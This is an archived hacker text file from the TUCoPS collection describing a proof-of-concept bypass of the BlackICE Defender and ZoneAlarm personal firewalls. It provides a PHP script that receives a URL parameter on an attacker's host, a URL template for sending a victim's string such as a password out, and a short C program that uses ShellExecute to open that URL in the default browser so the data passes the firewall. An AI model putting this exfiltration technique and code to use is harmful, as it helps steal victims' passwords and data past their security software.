TUCoPS :: Security App Flaws :: bypass.txt

Bypassing Blackice Defender and ZoneAlarm

                                                     /   ,
                                           /\       \ | /       /\
                                           |  \ \  _.=._  / /  |
                                             \  .  "     "  .  /
                                             /  / ^ \ / ^ \  \
                            . ' ` `  "  ,  /   |  0 | | 0  |   \  ,  "  ` ` ' .
                           /      ,       `  '  \  .---.  /  '  `       ,       \
                         /`     /`\    ,  . "  (          )  " .  ,    /`\      `\
                         /`            (    '  .  ' -.- '  .  '    )             `\
                         /"`              ".  _     :    _  ."                `"\
                           ` / .  ' ` " = ., _ `` = ``_ ,.  =   ` '  . \ `
                         . - " - .              )       (                 . - " - .
+- - - - - - - - { ' .    ' ` }- - - - -~     ~- - - - -{   '  .    ' ` } - - - - - - - -+
|                      ` " ---  " `                                  `   " ---  " `                      |
|     Black Ice Defender/ ZoneAlarm Bypasser                                         |
|     To get this idea i tryed to turn my brain                                              |
|     upside-down! the inculude function in php                                          |
|     me this idea...!                                                                                   |
|                                                                                                              |
|     www.truti.com                                                       Made By Truti     |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -+

You know how to make a web page there can resive variables?

in php it's simple just do this:

<?php
echo "String from victim: $blahblah";
?>

Name it "bypass_script.php"

and point a url at:
http://www.Your_Host.com/bypass_script.php?blahblah=The_String_You_Whant_To_Get_From_The_Victim

(The_String_You_Whant_To_Get_From_The_Victim is ment to by replaced with some thing else, a bad person cud place a password and get it trough the firewall system!). Remember the max url length is 255 characters!

Now you think that this all sounds good and easy, but how do you send the string from the victim?
I have made a little C program with a Winapi buildt in it, cus the "ShellExecute" commands (API) job is to open any file with the default program (a webpage's default program is offen a webrowser ;-)

Proof Of Concept Code:

<---------------------------------Start On Source Code--------------------------------->

// Made by: Truti - www.truti.com
// Programmed on Visual C++ 6.0 - STD
// Proof Of Concept Code for bypassing some personal firewalls
// parameter for the [Program].exe [thing_you_want_to_open_on_the_victims_computer]
// e.g. [Program].exe http://www.Your_Host.com/bypass_scr......

#include <windows.h>
#include <tchar.h>

int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR lpCmdLine, int nCmdShow)
{
HINSTANCE hInstance = ShellExecute(NULL, _T("open"), lpCmdLine, NULL, NULL, nCmdShow);

return (NULL);
}

<----------------------------------End Of Source Code---------------------------------->

You are not vulnerable if:
You don't use a webbrowser for surfing on the web, or ZoneAlarm is set to stop even surf (i have never seen that!).

(I can imagin that this trick works on manny other servers than just the tow mentioned, if you test it on otheres let me know! (main is on www.truti.com - (i change it in the next 2 weeks)))

Links:
shellexecute syntax: msdn.microsoft.com/library/en-us/shellcc/platform/ shell/reference/functions/shellexecute.asp
http://www.zonelabs.com/
http://blackice.iss.net/

(I hate when header is missing)
http://www.truti.com/headers/tchar.h
http://www.truti.com/headers/windows.h


EOF!

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH